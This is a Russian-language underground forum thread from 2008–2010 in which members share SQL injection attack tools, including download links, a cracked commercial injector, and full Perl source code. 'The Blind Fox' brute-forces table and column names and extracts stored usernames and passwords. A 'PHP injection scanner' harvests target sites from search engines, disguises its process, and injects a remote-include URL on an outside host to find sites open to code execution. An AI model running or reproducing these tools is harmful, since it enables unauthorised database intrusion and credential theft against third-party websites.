Вернуться   GraBBerZ.CoM - ICQ | Proxy | Бруты | Дедики | Эксплоиты > Underground > ][ack

Ответ
 
Опции темы Опции просмотра

Софт для работы с sql-inj
Старый 30.11.2008, 02:14   #1
пездюк
 
Аватар для faza02
 
faza02 вне форума
Регистрация: 24.03.2008
Сообщений: 2,303
Респекты: 3,521

Софт для работы с sql-inj

SQL Scanner
Cкачать

-reiluke SQL PHP Scanner
Скачать

JetSQL 2.0
Скачать

SQL Injection Tool 4 beta
Скачать

BSQL (Blind SQL) Hacker
Скачать

Bako's SQL Injection Scanner

Скачать
__________________
  Ответить с цитированием
Респектов за этот пост: 8

Старый 30.11.2008, 02:33   #2
Перезагрузка
 
Аватар для onthar
 
onthar вне форума
Регистрация: 02.06.2008
Сообщений: 6,075
Респекты: 8,974
SQL Power Injector 1.2

Офф.сайт
************************************************** ******

SQL Injection Helper[/center]

Скачать
pass: reiluke
************************************************** ******

SQL Injection Tool v2.1a

Скачать
************************************************** ******

DB Extractor [Perl]
PHP код:

#!/usr/bin/perl

use strict;
my($db_database,$db_prefix,$db_rowumbers,$db_splitter,$db_resultfile,$line,$realnum,$list,$dumplist,$x,@db_rowumbers,@fulldb,@rowdata);
sub usage{
   print 
"USAGE: <database>\tdb dump
   <prefix>\tPrefix of the table you're dumping
   <rows>\tNumbers pointing to the data you want, seperate by commas
   <delimiter>\tWhat to split the resulting data by.
   \t\tIf you want spaces then enclose with quotes
   <resultfile>\tFile to dump the data to\n"
;
   print 
"EX: dump_gamers.sql e107_users 2,5 : gamerdump.txt\n";
   exit;
}


&
usage unless @ARGV==5;
$db_database=$ARGV[0];
$db_prefix=$ARGV[1];
$db_rowumbers=$ARGV[2];
$db_splitter=$ARGV[3];
$db_resultfile =$ARGV[4];
@
db_rowumbers split(/,/,$db_rowumbers);
open(xfile"<$db_database") || die "Couldn't open $list\n";
@
fulldb = <xfile>;
close(xfile);
chomp(@fulldb);

foreach 
$line(@fulldb){
   if((
$line =~ m/INSERT INTO \'$db_prefix\'\((.*?)\)/i) || ($line =~ m/INSERT INTO \`$db_prefix\`\((.*?)\)/i)  || ($line =~ m/^INSERT INTO $db_prefix(.*?)\((.*?)\)/i)){
         $line =~ s/INSERT INTO \'$db_prefix\'/INSERT INTO \`$db_prefix\`/;
      @rowdata = split(/\'/,$line);
      open(DBLOG,">>$db_resultfile") || die "Couldn'
t open uname-$dumplist\n";
      print "
[+] ";
      for(
$x=0;$x<=$#db_rowumbers;$x++){
         
$realnum = $db_rowumbers[$x]*2-1;
         if(
$x==$#db_rowumbers){
            print "
$rowdata[$realnum]\n";
            print DBLOG "
$rowdata[$realnum]\n";
         }
         else{
            print "
$rowdata[$realnum]$db_splitter";
            print DBLOG "
$rowdata[$realnum]$db_splitter";
         }
      }
   }
}
      close(DBLOG);
      print "
[+] Parsing dumping completed\n"; 
The Blind Fox v0.5 | By Login-Root [Blind SQL Tool]
PHP код:

#!/usr/bin/perl


###########################################################################################
#                           -[+]- The Blind Fox v0.5 | By Login-Root -[+]-              ###
###########################################################################################

###########################################################################################
# [+] inf0:                                                                             ###
###########################################################################################
# It Searchs:                                                                           ###
# ===========                                                                           ###
#  - Check AND 1=1 && AND 1=0                                                           ###       
#  - Information_Schema && MySQL.User                                                   ###
#  - Tables                                                                             ###                                               
#  - Columns                                                                            ###
#  - Extract values from tables (Optional)                                              ###
#                                                                                       ###
#  ...and save it on a nice text file.                                                  ###
#                                                                                       ###
###########################################################################################

###########################################################################################
# [+] Use:                                                                              ###
###########################################################################################
# perl blindfox.pl [WEBSITE] [PATTERN] [FILE] [-EXT]                                    ###
#   [WEBSITE]: http://www.web.com/index.php?id=4875 (Use a valid number)                ###
#   [PATTERN]: Pattern that exists with AND 1=1, and that does not exist with AND 1=0   ###
#   [FILE]:    File where save the results                                              ###
#   [-EXT]:    To extract user names, passwords, etc. (Optional)                        ###
###########################################################################################

###########################################################################################
# [+] c0ntact:                                                                          ###
###########################################################################################
# MSN:    no.more@passport.com                                                          ###
# Jabber: login-root@x23.eu                                                             ###
# E-Mail: login_root@yahoo.com.ar                                                       ###
###########################################################################################

###########################################################################################
# [+] sh0utz:                                                                           ###
###########################################################################################
# In memory of ka0x | Greetz: KSHA ; Psiconet ; Knet ; VenoM ; InyeXion                 ###
# Many thanks to boER, who teach me a little of perl ;D                                 ###
# VISIT: WWW.MITM.CL | WWW.REMOTEEXECUTION.ORG | WWW.DIOSDELARED.COM                    ###
###########################################################################################

###########################################################################################
# ARGENTINA PRODUCT :)                                                                  ###
###########################################################################################

use LWP::Simple;

if(!
$ARGV[2])
   {
       print 
"\n\n-[+]- The Blind Fox v0.5 | By Login-Root -[+]-\n==============================================";
       print 
"\n\nUse: perl $0 [WEBSITE] [PATTERN] [FILE] [-EXT]\n";
       print 
"\n[WEBSITE]: http://www.web.com/index.php?id=4875 (Use a valid number)\n[PATTERN]: Pattern that exists with AND 1=1, and that does not exist with AND 1=0\n[FILE]:    File where save the results\n[-EXT]:    To extract user names, passwords, etc. (Optional)\n\n";
       exit (
0);
   }
   
sub end()
{
   print 
WEB "\n\n\n[*EOF*]";
    print 
"\n\n[+] Everything saved correctly in $ARGV[2]\n\n";
    print 
"## c0ded by Login-Root | 2008 ##\n\n";
    exit (
0); 
}   

   
@
nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
     
'name','names','nombre','nombres','member','members','admin_table',
     
'miembro','miembros','membername','admins','administrator','sign',
     
'administrators','passwd','password','passwords','pass','Pass',
     
'tAdmin','tadmin','user_password','usuarios','user_passwords','user_name','user_names',
     
'member_password','mods','mod','moderators','moderator','user_email',
     
'user_emails','user_mail','user_mails','mail','emails','email','address',
     
'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
     
'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
     
'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
     
'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
     
'sistema_usuario','sistema_password','contrasena','auth','key','senha','signin',
     
'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','club_authors',
      
'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
      
'membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup',
      
'associated','accnt','customers','customer','membres','administrateur','utilisateur',
      
'tuser','tusers','utilisateurs','password','amministratore','god','God','authors','wp_users',
      
'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
     
'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');

@
nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
          
'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
          
'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author','user_login',
          
'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
          
'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
          
'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');

if ( 
$ARGV[0]   !~   /^http:/ )
  {
      
$ARGV[0] = "http://" $ARGV[0];
  }

open(WEB,">>".$ARGV[2]) || die "\n\n[-] Failed creating the file\n";
print 
WEB "[WEBSITE]:\n\n$ARGV[0]\n";
print 
"\n[!] Checking for the pattern...\n";
      
$sql=$ARGV[0]." AND 1=1";
      
$response=get($sql);
      if(
$response =~ /$ARGV[1]/)
        {
            print 
"\n[+] Pattern found with AND 1=1\n";
            print 
WEB "$sql => OK !\n";
            
$sql=$ARGV[0]." AND 1=0";
            
$response=get($sql);
            if(
$response =~ /$ARGV[1]/)
            {
               print 
"[-] Pattern found with AND 1=0 too, website possible to not be vulnerable, try with another pattern\n";
               exit (
0);
            }
            else
            {
               print 
"[+] Pattern not found with AND 1=0, website vulnerable to Blind SQL Inyection\n";
               print 
WEB "$sql => OK !\n";
            }
         }
         else
               {
                  print 
"[-] Pattern not found, try with another\n";
                  exit (
0);
               }
        print 
"\n[!] Checking if Information_Schema exists...";
        
$sql=$ARGV[0]." AND (SELECT Count(*) FROM information_schema.tables)";
        
$response=get($sql);
         if(
$response =~ /$ARGV[1]/)
            {
               print 
"\n[+] Information_Schema available...saving in $ARGV[2]";
                print 
WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";
               
            }
         else
            {
               print 
"\n[-] Information_Schema unavailable";
            }
        print 
"\n[!] Checking if MySQL.User exists...";
        
$sql=$ARGV[0]." AND (SELECT Count(*) FROM mysql.user)";
        
$response=get($sql);
         if(
$response =~ /$ARGV[1]/)
            {
               print 
"\n[+] MySQL.User available...saving in $ARGV[2]";
                print 
WEB "\n\n[MYSQL.USER]:\n\n$sql\n";
               
            }
         else
            {
               print 
"\n[-] MySQL.User unavailable";
            }
        print 
"\n\n[!] Bruteforcing tables...";
        print 
WEB "\n\n[TABLES]:\n\n";
        foreach 
$tabla(@nombretabla)
         {
                  
chomp($tabla);
                  
$sql=$ARGV[0]." AND (SELECT Count(*) FROM ".$tabla.")";
                  
$response=get($sql);
                  if(
$response =~ /$ARGV[1]/)
                    {
                        print 
"\n[+] Table $tabla exists...saving in $ARGV[2]";
                        print 
WEB "$sql\n";
                    }
                }
        print 
"\n\n[!] Table to brute force columns: ";
            
$tabla.=<STDIN>;
            
chomp($tabla);
            print 
WEB "\n\n[COLUMNS IN $tabla]:\n\n";
            foreach 
$columna(@nombrecolumna)
            {
             
chomp($columna);
             
$sql=$ARGV[0]." AND (SELECT Count(".$columna.") FROM ".$tabla.")";
             
$response=get($sql);
             if (
$response =~ /$ARGV[1]/)
                  {
                      print 
"\n[+] Column $columna available...saving in $ARGV[2]";
                      print 
WEB "$sql\n";
                  }
            }
         if (
$ARGV[3] =~ /-EXT/)
         {
            
extrac:
            
$columna '';
            print 
"\n\n[!] Column of table $tabla to extract values: ";
            
$columna.=<STDIN>;
            
chomp($columna);
            print 
"[!] Extracting values from table $tabla and column $columna (Could take a long time)...\n\n";
            print 
WEB "\n\n[Values of table $tabla and column $columna]:\n\n";
            
$search 1;
            
$posicion 1;
            
$limit 0;
            
$comprob 1;
            while (
$search <= 255)
            {
               
$sql=$ARGV[0]." AND ascii(substring((SELECT " .$columna" FROM " .$tabla." limit " .$limit.",1),".$posicion.",1)) = " .$search;
               
$response=get($sql);
               if (
$response =~ /$ARGV[1]/)
                  {
                       
$char chr($search);
                       print 
WEB "$char";
                       print 
"$char";
                      
$search 0;
                      
$posicion++;
                      
$comprob++;
                  }
                 if (
$search == 255)
                 {
                    print 
"\n";
                    print 
WEB "\n";
                    if (
$comprob == 1)
                    {
                       
$eleccion '';
                       print 
"[+] Search finished. Want to extract value from another column? [Y/N]: ";
                       
$eleccion.=<STDIN>;
                       
chomp($eleccion);
                       if (
$eleccion =~ /Y/)
                       {
                          goto 
extrac;
                       }
                       else
                       {
                          
end();
                       }
                    }
                    
$comprob 1;
                    
$search 0;
                    
$limit++;
                 }
               
$search++;
            }
           }
end(); 
PHP injection scanner 5.0 [perl]
PHP код:

#!/usr/bin/perl


use LWP::Simple;
use 
IO::Socket::INET;



print 
"nnnnnnnnnnnnnnnnnn";
print 
"t[ PHP injection scanner 5.0 priv8 version by poerschke ]nt[ irc.gigachat.net #spykids ]nnn";

if(!@
ARGV[0]){
print 
"t[ use: perl php5.0.pl <procura> ]nn";
exit;
}
print 
"t[ Camuflando pid ]n";
my $processo "/usr/local/sbin/httpd - spy";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";

$
0="$processo"."0"x16;;
my $pid=fork;
exit if 
$pid;
die 
"Problema com o fork: $!" unless defined($pid);

print 
"t[ Pid: $pid Processo: $processo ]n";

$caxe ".";
$caxe1 ".";
$caxe .= rand(9999);
$caxe1 .= rand(9999);
$arq ".";
$arq int rand(9999);

open(sites,">$arq");
print 
sites "";
close(sites);


$procura = @ARGV[0];
chomp $procura;
print 
"t[ Procurando por $procura no Google ]n";
for(
$n=0;$n<900;$n += 10){
$sock IO::Socket::INET->new(PeerAddr => "www.google.com.br"PeerPort => 80Proto => "tcp") or next;
print 
$sock "GET /search?q=$procura&start=$n HTTP/1.0nn";
print 
$sock "Host: www.google.com.br";
print 
$sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
print 
$sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
print 
$sock "Accept-Language: pt-br, pt;q=0.50";
print 
$sock "Accept-Encoding: gzip, deflate, compress;q=0.9";
print 
$sock "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
print 
$sock "Keep-Alive: 300";
print 
$sock "Connection: keep-alive";

@
resu = <$sock>;
close($sock);
$ae "@resu";
while (
$ae=~ m/<a href=.*?>.*?</a>/){
$ae=~ s/<a href=(.*?)>.*?</a>/$1/;
$uber=$1;
if ($uber !~/translate/)
{
if ($uber !~ /cache/)
{
if ($uber !~ /"/)
{
if ($uber !~ /google/)
{
if ($uber !~ /216/)
{
if ($uber =~/http/)
{
if ($uber !~ /start=/)
{
open(arq,">>$arq");
print arq "$ubern";
close(arq);
}}}}}}}}}
print "t[ Procurando por $procura no Cade ]n";

for($cadenu=1;$cadenu <= 991; $cadenu +=10){

@cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next;
$ae = "@cade";

while ($ae=~ m/<em class=yschurl>.*?</em>/){
$ae=~ s/<em class=yschurl>(.*?)</em>/$1/;
$uber=$1;

$uber =~ s/ //g;
$uber =~ s/<b>//g;
$uber =~ s/</b>//g;

open(a,">>$arq");
print a "$ubern";
close(a);
}}
print "t[ Pronto sites pegos no google e cade ]n";
print "t[ Excluindo os sites repetidos ]n";
$ark = $arq;
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo ="";
foreach (@si){
if (!$si{$_})
{
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);


$a =0;
$b =0;
open(ae,"<$arq");
while(<ae>)
{$sites[$a] = $_;
chomp $sites[$a];
$a++;
$b++;}
close(ae);
print "t[ Total de sites para scanear: $a ]n";
for ($a=0;$a<=$b;$a++){
open (file, ">$caxe");
print file "";
close(file);
open (file, ">$caxe1");
print file "";
close(file);
$k=0;
$e=0;
$data=get($sites[$a]) or next;
while($data=~ m/<a href=".*?">.*?</a>/){
$data=~ s/<a href="(.*?)">.*?</a>/$1/;
$ubersite=$1;

if ($ubersite =~/"/)
{
$nu = index $ubersite, '"';
$ubersite = substr($ubersite,0,$nu);
}
if ($ubersite !~/http/)
{$ubersite = $sites[$a].'/'.$ubersite;}
open(file,">>$caxe") || die("nao abriu caxe.txt $!");
print file "$ubersiten";
close(file);
}

$lista1 = 'http://www.spykidsgroup.com/spy.gif?&cmd=ls%20/';
$t =0;
$y =0;
@ja;
open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
while (<opa>)
{
$ja[$t] = $_;
chomp $ja[$t];
$t++;
$y++;
}
close(opa);
$t=1;
while ($t < $y)
{
if ($ja[$t] =~/=/)
{
$num = rindex $ja[$t], '=';
$num += 1;
$ja[$t] = substr($ja[$t],0,$num);
open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
print jaera "$ja[$t]$lista1n";
close(jaera);
$num = index $ja[$t], '=';
$num += 1;
$ja[$t] = substr($ja[$t],0,$num);
$num1 = rindex $ja[$t], '.';
$subproc = substr($ja[$t],$num1,$num);

open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
print jaera "$ja[$t]$lista1n";
close(jaera);
}
$t++;
}
$ark = "$caxe1";
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo ="";
foreach (@si){
if (!$si{$_})
{
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);
$q=0;
$w=0;
@hot;
open (ops,"<$caxe1");
while(<ops>)
{
$hot[$q] = $_;
chomp $hot[$q];
$q++;
$w++;
}
close(ops);
print "t[ Começando o scan aguarde. Pode demorar horas. ]n";
for($q=0;$q<=$w;$q++)
{

if ($hot[$q] =~/http/)
{
$tipo=get($hot[$q]) or next;
if($tipo =~/root/)
{
if ($tipo =~/etc/)
{
if ($tipo =~/boot/)
{
open(a,">>res.txt");
print a "$hot[$q]n";
close(a);
}}}}}}

print "t[ Pronto scanner concluido ]n";
print "t[ O resultado foi salvo no ftp do spykids ]n"; 
__________________
onthar@fuckav.in
  Ответить с цитированием
Респектов за этот пост: 4

Старый 30.11.2008, 03:07   #3
пездюк
 
Аватар для faza02
 
faza02 вне форума
Регистрация: 24.03.2008
Сообщений: 2,303
Респекты: 3,521
Sql tool by xrou
Скачать

PRIAMOS SQL Injector & Scanner

Скачать
__________________
  Ответить с цитированием
Респектов за этот пост: 2

SQL Injector hackz Shop
Старый 13.12.2008, 21:10   #4
пездюк
 
Аватар для faza02
 
faza02 вне форума
Регистрация: 24.03.2008
Сообщений: 2,303
Респекты: 3,521
SQL Injector hackz Shop



типо spit.
Скачать
__________________
  Ответить с цитированием
Юзеру faza02 выразили Респект за этот пост:

SQL injector tool 1.0.0.1
Старый 16.12.2008, 20:35   #5
пездюк
 
Аватар для faza02
 
faza02 вне форума
Регистрация: 24.03.2008
Сообщений: 2,303
Респекты: 3,521
SQL injector tool 1.0.0.1




Скачать
__________________
  Ответить с цитированием
Респектов за этот пост: 3

MySQL Dump V.1 Released
Старый 19.12.2008, 14:14   #6
пездюк
 
Аватар для faza02
 
faza02 вне форума
Регистрация: 24.03.2008
Сообщений: 2,303
Респекты: 3,521
MySQL Dump V.1 Released


могу сказать одно - штука отличная, там и сканер скулей, и дампер, пара тулз для кодирования.
Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 5 сообщение(ий)):
У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.
__________________
  Ответить с цитированием
Юзеру faza02 выразили Респект за этот пост:

MySQLi v1.4 Alpha'Version 1.4 Alpha 1 Release
Старый 06.01.2009, 00:22   #7
пездюк
 
Аватар для faza02
 
faza02 вне форума
Регистрация: 24.03.2008
Сообщений: 2,303
Респекты: 3,521
MySQLi v1.4 Alpha'Version 1.4 Alpha 1 Release

схреншот
скачать
пасс: shahzadje
__________________
  Ответить с цитированием
Юзеру faza02 выразили Респект за этот пост:

Старый 16.06.2009, 19:11   #8
byte
 
Аватар для 2Fed
 
2Fed вне форума
Регистрация: 18.03.2009
Сообщений: 94
Респекты: 24
sqliHelper 2.7

  Ответить с цитированием
Респектов за этот пост: 5

Старый 21.06.2009, 17:34   #9
Перезагрузка
 
Аватар для onthar
 
onthar вне форума
Регистрация: 02.06.2008
Сообщений: 6,075
Респекты: 8,974
################################################## #######
# SQL INJECTOR V2.0
################################################## #######
# [+] What’s New in this version ?
# 1/ Evasion choise
# 2/ proxy support
# 3/ all previous bugs were fixed
# 4/ URl Extractor + vuln scanner & checker
# 5/ More InJeCtIoN OPTIONS
################################################## #######
# Language : PERL
# Coder : AlpHaNiX
################################################## #######

# Avaible Options :
–/// MySQL
MySQL column length calculator MySQL v4/5
MySQL target website db global infos MySQL v4/5
MySQL Full Schema Extractor MySQL v5
MySQL Data Dump MySQL v4/5
MySQL load_file fuzzer MySQL v4/5
MySQL Table_name Fuzzer MySQL v4
MySQL Column_name Fuzzer MySQL v4
–/// MsSQL
MsSQL DB global info
MsSQL Tables Extractor
MsSQL Columns Extractor
MsSQL Data Dumper
–/// Vulunerability Scanner
URL Extractor , SQL Vulnerability’s Scanner & checker



сорец
__________________
onthar@fuckav.in
  Ответить с цитированием
Юзеру onthar выразили Респект за этот пост:

BSQL Hacker v 0.9.0.7
Старый 26.08.2009, 20:24   #10
l
e
m
 
Аватар для flem
 
flem вне форума
Регистрация: 06.10.2006
Сообщений: 2,344
Респекты: 3,820
BSQL Hacker v 0.9.0.7



  Ответить с цитированием
Респектов за этот пост: 2

Pangolin professinal Edition Amazing SQL Injection World cracked
Старый 26.08.2009, 20:30   #11
l
e
m
 
Аватар для flem
 
flem вне форума
Регистрация: 06.10.2006
Сообщений: 2,344
Респекты: 3,820
Pangolin professinal Edition Amazing SQL Injection World cracked



Pangolin is an automatic SQL injection penetration testing tool developed by NOSEC. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.

DOWNLOAD

//Они троянят свой софт, юзаем на страх и риск. Onthar
  Ответить с цитированием
Юзеру flem выразили Респект за этот пост:

Старый 29.08.2009, 23:25   #12
bit
 
Аватар для ilias24
 
ilias24 вне форума
Регистрация: 01.01.2009
Сообщений: 47
Респекты: 9
sqliHelper 2.7 отличная тузла постоянно ей пользуюсь проста до невозможности
  Ответить с цитированием

SIPT 3
Старый 04.12.2009, 02:29   #13
ModeratoR
 
Аватар для cat1vo
 
cat1vo вне форума
Регистрация: 11.12.2006
Сообщений: 294
Респекты: 249
SIPT 3

Цитата:
Сообщение от XTT Посмотреть сообщение
залейте плиз SIPT3 ,найти не могу
depositfiles.com
rapidshare.com
__________________
PHP код:

mount -o loop palm.img /dev/face 

  Ответить с цитированием
Юзеру cat1vo выразили Респект за этот пост:

Старый 05.12.2009, 13:31   #14
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
Цитата:
Сообщение от XTT Посмотреть сообщение
залейте плиз SIPT3 ,найти не могу
Стукни автору асику 461998, у него больше нет сайта поетому он через аську передает, заодно и 4ю возьми.
__________________
  Ответить с цитированием

Старый 12.01.2010, 09:56   #15
bit
 
Аватар для hellorin
 
hellorin вне форума
Регистрация: 28.02.2009
Сообщений: 21
Респекты: 24
Непонимаю зачем под хайд кидать SQL helper если его спокойно можно скачать с офф сайта? И к тому же не указывать линк на офф сайт


Вот офф сайт:
_http://zarabyte.com/
  Ответить с цитированием
Респектов за этот пост: 3
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход



Время: 11:19



Powered by vBulletin® Version 3.7.6
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd. Перевод: zCarot